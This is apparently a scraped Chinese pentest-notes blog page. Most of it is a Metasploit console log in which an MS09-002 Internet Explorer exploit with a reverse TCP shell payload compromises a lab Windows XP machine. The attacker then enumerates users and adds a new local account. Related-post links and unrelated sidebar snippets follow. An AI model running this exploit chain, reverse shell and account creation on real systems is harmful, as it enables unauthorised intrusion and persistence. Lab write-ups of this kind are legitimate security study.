Welcome to the Metasploit Web Console!

| | _) |

__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|

| | | __/ | ( |\__ \ | | | ( | | |

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 308 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 308 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/browser/ms09_002_memory_corruption

>> set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> set SRVHOST 172.16.2.100

SRVHOST => 172.16.2.100

>> set LHOST 172.16.2.100

LHOST => 172.16.2.100

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 172.16.2.100 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 172.16.2.100 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> exploit

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.2.100:4444

[*] Using URL: http://172.16.2.100:8080/9wZVWxuy

[*] Server started.

>> back

>> sessions -l

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

1 shell 172.16.2.100:4444 -> 172.16.2.120:1125

>> sessions -i 1

sessions -i 1

'sessions' 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò

?ò?ú′|àí???t?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> ipconfig /all

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : www-95a235b5556

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

SUPPORT_388945a0

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user shentouceshiwy /add

net user shentouceshiwy /add

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

shentouceshiwy SUPPORT_388945a0

?üá?3é1|íê3é?£

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7的更多相关文章

  1. Windows XP PRO SP3 - Full ROP calc shellcode

    /*     Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode     Author: b33f (http://www.fuzzysec ...

  2. Windows XP with SP3大客户免激活日文版

    原贴地址:http://www.humin.com.cn/ja_windows_xp_professional_with_service_pack_3_x86_dvd_vl_x14-74058-iso ...

  3. “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windows XP Professional.vmx" was created by a VMware product

    “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windo ...

  4. 渗透测试实例Windows XP SP2

    一.msf> use exploit/windows/dcerpc/ms03_026_dcom.看到命令提示符的改变表明该命令已经运行成功. 二.为漏洞利用代码设置必要的参数,show opti ...

  5. Windows XP SP2上安装.net 4

    1.安装 KB893803-v2-x86 2.安装dotnetfx35 3.安装dotNetFx40_Client_x86_x64 4.安装 NET Framework 4.0

  6. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  7. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  8. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  9. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  10. 最新的windows xp sp3序列号(绝对可通过正版验证)

    MRX3F-47B9T-2487J-KWKMF-RPWBY(工行版) 可用(强推此号) QC986-27D34-6M3TY-JJXP9-TBGMD(台湾交大学生版) 可用 CM3HY-26VYW-6J ...

随机推荐

  1. (转)struts2:数据校验,通过XWork校验框架实现(validation.xml)

    转载自:http://www.cnblogs.com/nayitian/p/3475661.html struts2:数据校验,通过XWork校验框架实现(validation.xml)   根据输入 ...

  2. method

  3. JMeter学习-032-JMeter常见四种变量简介

    在JMeter自动化测试脚本编写过程中,经常需要对测试脚本进行一些参数设置.例如,设置测试计划的全局变量(方便切换不同的测试环境).样本线程(HTTP请求等)的参数传递等. 通常,JMeter中常用的 ...

  4. Python开发【前端】:汇总

    页面模板 1.EasyUI(推荐指数★) JQuery EasyUI中文网 下载 使用方法:把文件下载到本地.直接从官网上把源码拷贝过来,更改下js的路径即可 优点:功能非常多.非常齐全 偏做后台管理 ...

  5. 限制EditText最多输入多少汉字

    mInputEditText.setFilters(new InputFilter[]{new InputLengthFilter(MAX_INPUT_SIZE)}); public class In ...

  6. Global Mapper Lidar点云分类

    Global Mapper Lidar Module还挺厉害的,自动分类的效果很不错. 首先去除地面点,用的是形态学滤波方法. 之后可以分类出建筑物.低中高树木.电力线路. https://www.b ...

  7. Win7开机登陆密码忘记了?不必重做系统(详图)

     1)如果是普通账户密码忘了.方法:重新启动电脑,启动到系统登录界面时,同时按住Ctrl+Alt键,然后连击Del键两次,会出现新的登录界面,用户名处输入“Administrator”密码为空,回车即 ...

  8. Java多线程开发系列之一:走进多线程

    对编程语言的基础知识:分支.选择.循环.面向对象等基本概念理解后,我们需要对java高级编程有一定的学习,这里不可避免的要接触到多线程开发. 由于多线程开发整体的系统比较大,我会写一个系列的文章总结介 ...

  9. Visual Studio 2015 Update 3 正式版下载

    vs2015-update3    .NET Core 1.0  文件名 cn_visual_studio_enterprise_2015_with_update_3_x86_x64_dvd_8923 ...

  10. [osx] 设置crontab

    比较坑爹,直接使用 crontab -e 设置是没有效果的,只能这样设置 env EDITOR=vi crontab -e Have fun with Max OSX